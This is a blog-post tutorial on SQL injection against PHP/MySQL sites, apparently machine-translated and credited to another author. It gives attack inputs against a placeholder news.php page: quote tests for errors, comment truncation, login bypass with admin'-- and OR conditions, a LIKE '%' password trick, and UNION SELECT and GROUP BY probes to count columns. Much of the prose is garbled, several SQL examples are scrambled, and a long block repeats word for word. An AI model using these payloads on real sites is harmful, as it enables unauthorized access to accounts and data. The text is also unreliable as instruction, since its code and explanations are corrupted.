Assalam-0-Alaikum,
Today we are going to learn about MySQL injection a complete tutorial , well i say a complete book i don't say this tutorial is completely represented to me but i say it is written by me :p
originally was written by attack
*************************************786**************************************
I have make it a series so i could implement it sharply:
- Lesson 1 And 2 Intro and type of Vulnerabilities
- Lesson 3 Learning about My SQL
- Lesson 4 Expert Learning About MySQL
I will not do a SQL injection is probably not for you then know what is the first day of an article carried by breaking away. The necessary information so that the attacker was a query from the database, then changes to the database where the simple injection SQL injection attack is a type of the original query.
Assimilation is required for this article:
a) The presence of brain :p
b) Direct hands
a) Knowledge of SQL language
Basically, this article is written for PHP MYSQL MSSQL, but there are a few examples.
In fact, the best way but, SQL injection is not reading this article to find out running smoothly as a living like to think that the most precise application, write or use a scenario set out on my end.
Each paragraph was important for the next item, etc., because the meantime, I recommend to read all
Unfortunately, until the paper is divided into several messages does not match the 20,000-character limit.
Still pretty easy. We have all the fields, variables, cookies and should bury a pair of single quotes.
1.1 In the first case
script here
b) Direct hands
a) Knowledge of SQL language
Basically, this article is written for PHP MYSQL MSSQL, but there are a few examples.
In fact, the best way but, SQL injection is not reading this article to find out running smoothly as a living like to think that the most precise application, write or use a scenario set out on my end.
Each paragraph was important for the next item, etc., because the meantime, I recommend to read all
Unfortunately, until the paper is divided into several messages does not match the 20,000-character limit.
Still pretty easy. We have all the fields, variables, cookies and should bury a pair of single quotes.
1.1 In the first case
script here
_http: / / xxx / news.php? Id = 1
Suppose the original request to the database as follows:
Note: SELECT * FROM news WHERE id = '1 ';
Quote Now append variable, therefore, such as "id"
_http: / / xxx / news.php? Id = 1 '
variable is not filtered and contains the error messages will appear something like this:
mysql_query (): You have an error in SQL syntax; the right syntax to use near '1''corresponds to your MySQL server version for the manual control
Since an extra query to the database might offer:
SELECT * FROM news WHERE id = '1'';
error reporting is turned off in this case, we would not be confused with such deficits in paragraph 1.4 (also does not prevent it, can determine the presence of. the same as described in
paragraph): _http: / / xxx / news.php? Id = 1 '; -
Will now query the database:
SELECT * FROM news WHERE id = '1 '; -';
(For those who tank "-" a sign of the beginning of all comments after it is thrown, it is still (so is written documentation, since that space must be sure that I would like to draw your attention to the fact that MySQL) and a road in front of him). Thus, for the MySQL query remains the same and looks the same
_http: / / xxx / news.php? Id = 1
Lets See About Some Sql,
Code:
SELECT * FROM users WHERE LIKE 'admin' login and pass LIKE '123 ';
This script even if filters are already quoted, is vulnerable to injection. We are just (the LIKE operator, the symbol "%" matches any string to) "%" instead of a password, and then query the need for
Code:
WHERE LIKE 'admin' AND LIKE '%' SELECT * FROM users pass the entrance;
and input 'admin' was allowed in with. In this case, we not only successfully used in SQL injection is not found.
If the script does not check the authority to offer the same, for?
IMHO at least the kind of information would be foolish to use for the withdrawal of the injection. Let the type of a database query:
Code:
SELECT * FROM users WHERE login = 'admin' AND '= '123 pass;
Unfortunately, the password '123 'is not appropriate, but we found the injection parameter is acceptable,' and this user will be registered under the name of 'administrator login', we need to write, instead of something like this admin '; - part of the authentication password, and we discarded the nickname' Admin 'goes.
'AND pass = '123'; -; WHERE login = 'admin' SELECT * FROM users
Now what to do if the 'pass' to a security vulnerability. We are 123 'OR login =' admin 'on the appropriate area; -. The investigation will be:
Code:
SELECT * FROM users WHERE login = 'admin' AND pass = '123 'OR login =' admin '; -';...
As for the database will be completely inde intechno this query:
Code:
SELECT * FROM users WHERE 'OR (login = admin') (login = 'admin' AND pass = '123) ';
After these steps, we input 'admin' will have the full Acre.
Return to news script. SQL language, numeric parameters, we must remember that the command to put the nail that is at
_http: / / xxx / news.php? Id = 1
request to the database looks like this:
WHERE id = 1 SELECT * FROM news (News);
In addition, the parameter 'id' quotes can be substituted in the same error message, skip this injection detect:
mysql_query (): You have an error in SQL syntax; the right syntax to use near '1''corresponds to your MySQL server version for the manual control
I can see that we offer vyprigivaet this message is not filtered, and then you need to enter
_http: / / xxx / news.php? Bla-bla-bla-ID = 1
DB, for sho blah blah blah does not understand, and displays an error message such as:
mysql_query (): You have an error in SQL syntax; '1 bla-bla-bla 'the right syntax to use near corresponds to your MySQL server version for the manual control
After the check is turned off error reporting on these
ListenRead phonetically
_http: / / xxx / news.php? Id = 1; -
He and look exactly
_http: / / xxx / news.php? Id = 1
Next you will be able to make it difficult for yourself, paragraph 1.1 of the vulnerability described below will be considered a remake not only the type and
To begin with the most useful thing (who knows, Google is not enter) that the team ... UNION
Modify the command treatment
_http: / / xxx / news.php? Id = 1 'UNION SELECT 1 -.
The query from the database are as follows:
Code:
WHERE = '1 'UNION SELECT 1 -' id SELECT * FROM news;
Not like this before and after the number of columns in UNION (table unless there is a news column), forgetting about the truth will come out to meet the specific error:
mysql_query (): different number of columns used in SELECT statements
In this case, we need to get kolichistvo columns (regardless of the number of pre-and post-UNION sootvetsvovalo). to do this way:
_http: / / xxx / news.php? id = 1 'UNION SELECT 1, 2 -
Error. «A different number of columns used in SELECT statements»
_http: / / xxx / news.php? id = 1 'UNION SELECT 1,2,3 -
Error again
_http: / / xxx / news.php? id = 1 'UNION SELECT 1,2,3,4,5,6 -
About! Right on the screen, as well as http://xxx/news.php?id=1
6 pieces of their chosen fields, the average ...
But this method is based on the selection of the number of fields with GROUP BY. This type of request:
_http: / / xxx / news.php? id = 1 'GROUP BY 2 -
The number of these fields are less than or equal to 2 is not displayed.
Making such a request:
_http: / / xxx / news.php? id = 1 'GROUP BY 10 -
Oops ... There was an error mode.
mysql_query (): Unknown column '10 group statement 'in'
Then the column is less than 10 people. Divide by 2 to 10. And a request
_http: / / xxx / news.php? id = 1 'GROUP BY 5 -
Ooops error column number greater than or equal to 5, but that means 10 less. As it turns out 7 is the mean value from 5 to 10 now. Making a request:
_http: / / xxx / news.php? id = 1 'GROUP BY 7 -
another error ...
Another mismysql_query (): Unknown column '7 group statement 'in'
but 7 is less than or equal to the number 5 so. Better get the next request ...
_http: / / xxx / news.php? id = 1 'GROUP BY 6 -
No errors ... but 7 is less than or equal to the number 6, so. These columns are followed by 6 that the required number.
Code:
WHERE LIKE 'admin' AND LIKE '%' SELECT * FROM users pass the entrance;
and input 'admin' was allowed in with. In this case, we not only successfully used in SQL injection is not found.
If the script does not check the authority to offer the same, for?
IMHO at least the kind of information would be foolish to use for the withdrawal of the injection. Let the type of a database query:
Code:
SELECT * FROM users WHERE login = 'admin' AND '= '123 pass;
Unfortunately, the password '123 'is not appropriate, but we found the injection parameter is acceptable,' and this user will be registered under the name of 'administrator login', we need to write, instead of something like this admin '; - part of the authentication password, and we discarded the nickname' Admin 'goes.
'AND pass = '123'; -; WHERE login = 'admin' SELECT * FROM users
Now what to do if the 'pass' to a security vulnerability. We are 123 'OR login =' admin 'on the appropriate area; -. The investigation will be:
Code:
SELECT * FROM users WHERE login = 'admin' AND pass = '123 'OR login =' admin '; -';...
As for the database will be completely inde intechno this query:
Code:
SELECT * FROM users WHERE 'OR (login = admin') (login = 'admin' AND pass = '123) ';
After these steps, we input 'admin' will have the full Acre.
Return to news script. SQL language, numeric parameters, we must remember that the command to put the nail that is at
_http: / / xxx / news.php? Id = 1
request to the database looks like this:
WHERE id = 1 SELECT * FROM news (News);
In addition, the parameter 'id' quotes can be substituted in the same error message, skip this injection detect:
mysql_query (): You have an error in SQL syntax; the right syntax to use near '1''corresponds to your MySQL server version for the manual control
I can see that we offer vyprigivaet this message is not filtered, and then you need to enter
_http: / / xxx / news.php? Bla-bla-bla-ID = 1
DB, for sho blah blah blah does not understand, and displays an error message such as:
mysql_query (): You have an error in SQL syntax; '1 bla-bla-bla 'the right syntax to use near corresponds to your MySQL server version for the manual control
After the check is turned off error reporting on these
ListenRead phonetically
_http: / / xxx / news.php? Id = 1; -
He and look exactly
_http: / / xxx / news.php? Id = 1
Next you will be able to make it difficult for yourself, paragraph 1.1 of the vulnerability described below will be considered a remake not only the type and
To begin with the most useful thing (who knows, Google is not enter) that the team ... UNION
Modify the command treatment
_http: / / xxx / news.php? Id = 1 'UNION SELECT 1 -.
The query from the database are as follows:
Code:
WHERE = '1 'UNION SELECT 1 -' id SELECT * FROM news;
Not like this before and after the number of columns in UNION (table unless there is a news column), forgetting about the truth will come out to meet the specific error:
mysql_query (): different number of columns used in SELECT statements
In this case, we need to get kolichistvo columns (regardless of the number of pre-and post-UNION sootvetsvovalo). to do this way:
_http: / / xxx / news.php? id = 1 'UNION SELECT 1, 2 -
Error. «A different number of columns used in SELECT statements»
_http: / / xxx / news.php? id = 1 'UNION SELECT 1,2,3 -
Error again
_http: / / xxx / news.php? id = 1 'UNION SELECT 1,2,3,4,5,6 -
About! Right on the screen, as well as http://xxx/news.php?id=1
6 pieces of their chosen fields, the average ...
But this method is based on the selection of the number of fields with GROUP BY. This type of request:
_http: / / xxx / news.php? id = 1 'GROUP BY 2 -
The number of these fields are less than or equal to 2 is not displayed.
Making such a request:
_http: / / xxx / news.php? id = 1 'GROUP BY 10 -
Oops ... There was an error mode.
mysql_query (): Unknown column '10 group statement 'in'
Then the column is less than 10 people. Divide by 2 to 10. And a request
_http: / / xxx / news.php? id = 1 'GROUP BY 5 -
Ooops error column number greater than or equal to 5, but that means 10 less. As it turns out 7 is the mean value from 5 to 10 now. Making a request:
_http: / / xxx / news.php? id = 1 'GROUP BY 7 -
another error ...
Another mismysql_query (): Unknown column '7 group statement 'in'
but 7 is less than or equal to the number 5 so. Better get the next request ...
_http: / / xxx / news.php? id = 1 'GROUP BY 6 -
No errors ... but 7 is less than or equal to the number 6, so. These columns are followed by 6 that the required number.
Much for this article rest will be on the next one.
Regards,
Zulqurnain jutt
I am a pro-programmer of C++ ,php i can crack some softwares and am a web desighner .I AM also on
0 Comments :
Post a Comment
Having Confusion ,oH Dear ask me in comments!!